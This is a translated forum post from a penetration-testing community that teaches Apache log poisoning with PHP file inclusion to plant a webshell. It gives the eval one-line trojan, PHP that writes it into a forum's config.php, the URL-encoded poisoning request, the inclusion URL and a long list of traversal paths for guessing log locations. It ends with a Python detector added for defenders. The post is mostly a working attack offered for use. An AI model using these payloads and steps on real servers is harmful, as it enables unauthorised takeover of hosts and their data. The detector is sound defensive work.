中国网络渗透测试联盟

Title: PHP include of Apache log to write a shell

Author: admin    Time: 2012-9-15 14:27
Title: PHP include of Apache log to write a shell
Because the method above is pretty impractical (in my tests I found the log was often tens of megabytes, which takes all the fun out of it), let's think a bit further below: we write in a genuinely practical webshell to use, which is also much better than the painfully slow method above.

For example, still this one-line trojan:
<?eval($_POST[cmd]);?>

By now you may have thought of it: this is quite a good method. Read on; the problem then becomes how to write it in. Use this statement:
fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then writes in the one-line trojan server-side statement <?eval($_POST[cmd]);?>. Put together as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   //write the one-line trojan statement into config.php

We submit this statement, let Apache record it in the error log, then include it, and the shell is written successfully. Remember: it must be converted to URL format for it to work.
Converted to:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

This way the error log has recorded this line of webshell-writing code.
Then we include the log, submitting
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

With that the webshell is written successfully; the one-line trojan statement is written into config.php.
OK.
http://www.xxx.com/forum/config.php has now become our webshell.
Just connect with lanker's client and the host is yours.

PS: The above requires that the folder permissions be writable; they must be -rwxrwxrwx (777) to proceed. Here, just use the directory listed above to check. Everything above is exploitation for the case where the log path is known.

For other log paths you can guess, or refer to these:
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log
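Added example, not part of the original post: a small Python detector that picks out both halves of the technique from an Apache access log, the poisoning request (PHP tags in a logged field once URL-decoded, including double-encoded ones) and the later inclusion request (a query parameter that traverses to a log file). The combined log format, the sample lines and the z.php/zizzy names are constructed from the post and are assumptions.

```python
import re
from urllib.parse import unquote

# Apache combined log format (tolerates a missing referer/user-agent pair).
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
PHP_TAG_RE = re.compile(r'<\?.*?\?>', re.S)              # opening and closing PHP tag
LOG_FILE_RE = re.compile(r'(?:access|acces|error)[._-]?log\b', re.I)
TRAVERSAL_RE = re.compile(r'\.\./|^/')                   # "../" traversal or absolute path

def full_decode(s, rounds=3):
    """URL-decode up to `rounds` times so double-encoded payloads are still seen."""
    while rounds and "%" in s:
        s, rounds = unquote(s), rounds - 1
    return s

def analyze_line(line):
    """Return (finding, detail) tuples for one access-log line; [] if clean."""
    m = LOG_RE.match(line)
    if not m:
        return [("unparsed", line[:40])]
    findings = []
    # Poisoning: any logged free-text field that carries PHP tags once decoded.
    for field in ("request", "referer", "ua"):
        if PHP_TAG_RE.search(full_decode(m.group(field) or "")):
            findings.append(("log_poisoning", field))
    # Inclusion: a query parameter whose value traverses to a log file.
    parts = m.group("request").split(" ")
    path = parts[1] if len(parts) > 1 else ""
    if "?" in path:
        for param in path.split("?", 1)[1].split("&"):
            name, _, raw = param.partition("=")
            value = full_decode(raw)
            if TRAVERSAL_RE.search(value) and LOG_FILE_RE.search(value):
                findings.append(("log_inclusion", name))
    return findings

def scan(lines):
    """Map 1-based line numbers to their findings, skipping clean lines."""
    hits = ((i, analyze_line(line)) for i, line in enumerate(lines, 1))
    return {i: f for i, f in hits if f}

SAMPLE_LOG = [  # constructed lines mirroring the two requests in the post above
    '203.0.113.5 - - [15/Sep/2012:14:27:01 +0800] "GET /%3C%3Feval%28%24_POST%5Bcmd%5D%29%3B%3F%3E HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Sep/2012:14:27:30 +0800] "GET /z.php?zizzy=../../../../var/log/httpd/error_log HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Sep/2012:14:28:00 +0800] "GET /forum/index.php?page=2 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
]
```

Running scan(SAMPLE_LOG) flags line 1 as log_poisoning on the request field and line 2 as log_inclusion on the zizzy parameter; the ordinary forum request on line 3 produces nothing.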

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2